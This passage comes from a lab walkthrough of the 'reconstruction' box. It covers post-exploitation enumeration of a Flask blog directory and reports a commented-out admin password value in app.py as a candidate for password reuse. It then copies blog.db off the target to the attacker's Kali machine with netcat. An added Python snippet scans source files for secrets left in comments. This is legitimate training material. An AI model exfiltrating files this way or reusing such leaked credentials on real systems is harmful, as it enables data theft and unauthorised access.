Blog
Checking the web application directory after manual enumeration
www-data@reconstruction:~/blog$ ll
total 88K
4.0K drwxr-xr-x 3 root root 4.0K Sep 30 2020 ..
4.0K drwxr-xr-x 5 root root 4.0K Apr 29 2020 .
12K -rwxr-xr-x 1 root root 9.7K Apr 29 2020 app.py
4.0K drwxr-xr-x 3 root root 4.0K Apr 29 2020 templates
4.0K drwxr-xr-x 2 root root 4.0K Apr 29 2020 __pycache__
4.0K -rw-r--r-- 1 root root 76 Apr 29 2020 wsgi.py
44K -rw-r--r-- 1 root root 44K Apr 29 2020 blog.db
4.0K -rw-r--r-- 1 root root 193 Apr 29 2020 blog.ini
4.0K -rw-r--r-- 1 root root 13 Apr 29 2020 default.blog
4.0K drwxr-xr-x 5 root root 4.0K Apr 29 2020 static
There is the app.py file as well as the DB file, blog.db.
app.py
The app.py file contains another admin password that’s commented out: ee05d64d2528102d45e2db60986727ed
This may be used to test for password reuse.
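A defender-side check for this kind of finding, as an added example that is not part of the original write-up or of the target's code: it scans Python source for credentials left in comments before the file is deployed. The keyword list, the function name `find_commented_secrets` and the sample source are assumptions constructed for illustration.

```python
import io
import re
import tokenize

# Identifier containing a credential keyword, assigned a quoted literal.
# The keyword list is an assumption for this example, not taken from app.py.
ASSIGN_RE = re.compile(
    r"(?i)[a-z0-9_]*(?:pass(?:word|wd)?|secret|token|api_?key)[a-z0-9_]*"
    r"\s*[:=]\s*['\"][^'\"]+['\"]"
)
# Bare 32-hex value (MD5-sized), the shape of the string found in app.py.
HEX32_RE = re.compile(r"\b[0-9a-fA-F]{32}\b")


def find_commented_secrets(source):
    """Return (line, reason) for each comment that looks like a credential.

    Only comment tokens are inspected, so '#' inside string literals is
    ignored. The matched value is never returned, to keep it out of CI logs.
    """
    findings = []
    for tok in tokenize.generate_tokens(io.StringIO(source).readline):
        if tok.type != tokenize.COMMENT:
            continue
        text = tok.string.lstrip("#").strip()
        if ASSIGN_RE.search(text):
            findings.append((tok.start[0], "credential assignment"))
        elif HEX32_RE.search(text):
            findings.append((tok.start[0], "32-hex value"))
    return findings


# Constructed sample source (placeholder values, not the real app.py).
SAMPLE = '''\
import os
DB_PATH = "blog.db"
# admin_password = "00000000000000000000000000000000"
admin_password = load_from_env()  # rotated value
note = "# password = 'not-a-comment'"
# backup key 11111111111111111111111111111111
'''

if __name__ == "__main__":
    for line, reason in find_commented_secrets(SAMPLE):
        print(f"line {line}: {reason}")
```

Any value this flags should be treated as exposed and rotated, since removing the comment does not remove it from version history or from copies already deployed.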
Database
www-data@reconstruction:~/blog$ nc -nv 192.168.45.215 2222 < ./blog.db
Connection to 192.168.45.215 2222 port [tcp/*] succeeded!
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/reconstruction]
└─$ nnc 2222 > blog.db
listening on [any] 2222 ...
connect to [192.168.45.215] from (UNKNOWN) [192.168.209.103] 54362
Transferred to Kali
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/reconstruction]
└─$ file blog.db
blog.db: SQLite 3.x database, last written using SQLite version 3022000, file counter 6, database pages 11, cookie 0xa, schema 4, UTF-8, version-valid-for 6
N/A